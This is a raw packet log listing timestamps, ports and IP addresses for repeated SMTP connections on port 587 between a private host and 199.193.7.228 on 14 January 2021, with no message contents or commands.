Jan 14, 2021 08:02:06.540132999 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:06.541127920 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:06.541807890 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:06.544200897 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:06.547341108 CET	49818	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:06.560635090 CET	587	49817	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:06.739955902 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:06.741179943 CET	49818	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:06.931140900 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:06.931835890 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:06.932323933 CET	49818	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:07.122363091 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:07.126060963 CET	49818	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:07.316184998 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:07.316258907 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:07.316271067 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:07.320393085 CET	49818	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:07.322060108 CET	49818	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:07.323043108 CET	49818	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:07.512157917 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:07.512177944 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:07.513012886 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:07.513632059 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:07.515830994 CET	49818	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:07.707146883 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:07.708625078 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:07.709172964 CET	49818	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:07.899171114 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:07.902295113 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:07.916021109 CET	49818	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:08.106209040 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:08.108936071 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:08.109762907 CET	49818	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:08.301188946 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:08.325222015 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:08.328283072 CET	49818	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:08.518491030 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:08.520960093 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:08.528259993 CET	49818	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:08.528348923 CET	49818	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:08.528445005 CET	49818	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:08.528542042 CET	49818	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:08.528645992 CET	49818	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:08.528737068 CET	49818	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:08.528829098 CET	49818	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:08.718377113 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:08.718404055 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:08.718472958 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:08.718585968 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:08.718626976 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:08.718735933 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:08.721348047 CET	49818	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:08.721548080 CET	49818	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:08.723470926 CET	49818	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:08.911653042 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:08.911865950 CET	49818	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:08.911995888 CET	49818	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:08.913799047 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:08.914022923 CET	49818	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:08.991206884 CET	49823	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:09.118345976 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:09.118376017 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:09.118391991 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:09.118406057 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:09.118417025 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:09.121881008 CET	49818	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:09.121977091 CET	49818	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:09.181610107 CET	587	49823	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:09.183665037 CET	49823	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:09.312417984 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:09.312517881 CET	49818	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:09.312529087 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:09.312551022 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:09.312649965 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:09.312714100 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:09.312725067 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:09.312863111 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:09.312891960 CET	49818	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:09.312927008 CET	49818	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:09.313904047 CET	49818	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:09.314614058 CET	49818	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:09.321603060 CET	49818	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:09.321691990 CET	49818	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:09.375710011 CET	587	49823	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:09.376919985 CET	49823	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:09.502748013 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:09.502770901 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:09.502928972 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:09.503050089 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:09.503212929 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:09.503284931 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:09.503969908 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:09.504002094 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:09.504087925 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:09.504168987 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:09.504781961 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:09.511688948 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:09.532485962 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:09.566937923 CET	587	49823	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:09.568360090 CET	587	49823	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:09.572520018 CET	49823	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:09.579613924 CET	49818	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:09.762430906 CET	587	49823	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:09.767360926 CET	49823	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:09.957221985 CET	587	49823	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:09.957493067 CET	587	49823	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:09.957509041 CET	587	49823	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:09.958501101 CET	49823	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:09.959856033 CET	49823	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:09.960515976 CET	49823	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:10.149640083 CET	587	49823	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:10.149749994 CET	587	49823	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:10.150305033 CET	587	49823	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:10.151695967 CET	587	49823	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:10.152585983 CET	49823	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:10.342967987 CET	587	49823	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:10.344083071 CET	587	49823	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:10.344824076 CET	49823	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:10.535171986 CET	587	49823	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:10.537648916 CET	587	49823	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:10.538013935 CET	49823	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:10.730376005 CET	587	49823	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:10.734055042 CET	587	49823	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:10.734761000 CET	49823	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:10.919187069 CET	49818	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:10.924690008 CET	587	49823	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:10.963061094 CET	587	49823	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:10.965863943 CET	49823	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:11.029843092 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:11.109282970 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:11.110709906 CET	587	49818	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:11.112019062 CET	49818	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:11.155724049 CET	587	49823	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:11.157860041 CET	587	49823	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:11.158817053 CET	49823	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:11.158957005 CET	49823	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:11.159073114 CET	49823	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:11.159216881 CET	49823	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:11.159352064 CET	49823	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:11.159460068 CET	49823	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:11.159560919 CET	49823	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:11.159660101 CET	49823	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:11.220212936 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:11.220400095 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:11.348788977 CET	587	49823	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:11.348839045 CET	587	49823	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:11.348865986 CET	587	49823	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:11.348891020 CET	587	49823	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:11.349188089 CET	587	49823	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:11.349220991 CET	587	49823	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:11.349248886 CET	587	49823	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:11.350327015 CET	587	49823	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:11.363578081 CET	587	49823	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:11.413281918 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:11.413774014 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:11.485229015 CET	49823	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:11.559885025 CET	49823	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:11.603573084 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:11.604326963 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:11.605890036 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:11.749604940 CET	587	49823	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:11.750816107 CET	587	49823	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:11.750828981 CET	587	49823	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:11.750914097 CET	49823	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:11.751419067 CET	49823	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:11.795685053 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:11.797454119 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:11.941653967 CET	587	49823	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:11.987445116 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:11.987469912 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:11.987531900 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:11.988554001 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:11.990036964 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:11.990926027 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:12.179941893 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:12.179999113 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:12.180733919 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:12.181308985 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:12.185900927 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:12.375797987 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:12.378537893 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:12.379507065 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:12.569618940 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:12.572165966 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:12.572689056 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:12.762846947 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:12.763739109 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:12.785237074 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:12.975249052 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:13.005254984 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:13.007492065 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:13.197611094 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:13.198792934 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:13.201314926 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:13.202702045 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:13.202836990 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:13.202951908 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:13.203238964 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:13.203434944 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:13.203541040 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:13.392241001 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:13.392601967 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:13.392613888 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:13.392755032 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:13.392887115 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:13.393264055 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:13.393275976 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:13.393372059 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:13.393484116 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:13.393503904 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:13.393541098 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:13.393584967 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:13.393591881 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:13.582730055 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:13.582990885 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:13.583297968 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:13.583380938 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:13.583396912 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:13.583462954 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:13.583503962 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:13.773016930 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:13.773416996 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:13.773636103 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:13.773648977 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:13.773657084 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:13.773668051 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:13.773864031 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:13.773920059 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:13.773936033 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:13.963536978 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:13.963567019 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:13.963928938 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:13.963939905 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:13.964159012 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:13.964163065 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:14.154650927 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:14.154687881 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:14.155112028 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:14.179455042 CET	587	49806	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:14.181353092 CET	49806	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:14.202896118 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:14.203099966 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:14.203327894 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:14.203428984 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:14.203609943 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:14.203802109 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:14.203973055 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:14.204334974 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:14.210953951 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:14.211116076 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:14.211209059 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:14.211302996 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:14.211396933 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:14.213356972 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:14.213563919 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:14.213701010 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:14.214462996 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:14.214566946 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:14.214659929 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:14.214746952 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:14.214833975 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:14.214929104 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:14.216003895 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:14.216267109 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:14.216326952 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:14.217722893 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:14.217797995 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:14.217911005 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:14.218067884 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:14.219274044 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:14.219409943 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:14.219583988 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:14.241729021 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:14.245599985 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:14.245752096 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:14.245980024 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:14.298181057 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:14.393172979 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:14.393201113 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:14.393290997 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:14.393403053 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:14.393765926 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:14.393780947 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:14.394566059 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:14.401016951 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:14.401068926 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:14.401114941 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:14.401191950 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:14.403399944 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:14.403419018 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:14.403512001 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:14.404340982 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:14.404361010 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:14.404474020 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:14.404552937 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:14.404630899 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:14.404714108 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:14.406150103 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:14.406171083 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:14.406177998 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:14.407636881 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:14.407721043 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:14.407958031 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:14.409145117 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:14.409193039 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:14.409429073 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:14.431785107 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:14.435576916 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:14.435744047 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:14.454112053 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:14.488843918 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:14.489162922 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:14.501405954 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:14.680536032 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:14.682537079 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:14.872663021 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:14.873294115 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:14.905807018 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:15.096021891 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:15.142122984 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:16.713737965 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:16.904058933 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:16.904149055 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:16.904206991 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:16.904274940 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:16.977636099 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:16.981117010 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:17.168016911 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:17.168045998 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:17.171355963 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:17.172316074 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:17.172863960 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:17.358771086 CET	49827	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:17.362215996 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:17.363120079 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:17.364305973 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:17.364929914 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:17.548861980 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:17.549726963 CET	587	49827	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:17.549978018 CET	49827	587	192.168.2.3	199.193.7.228
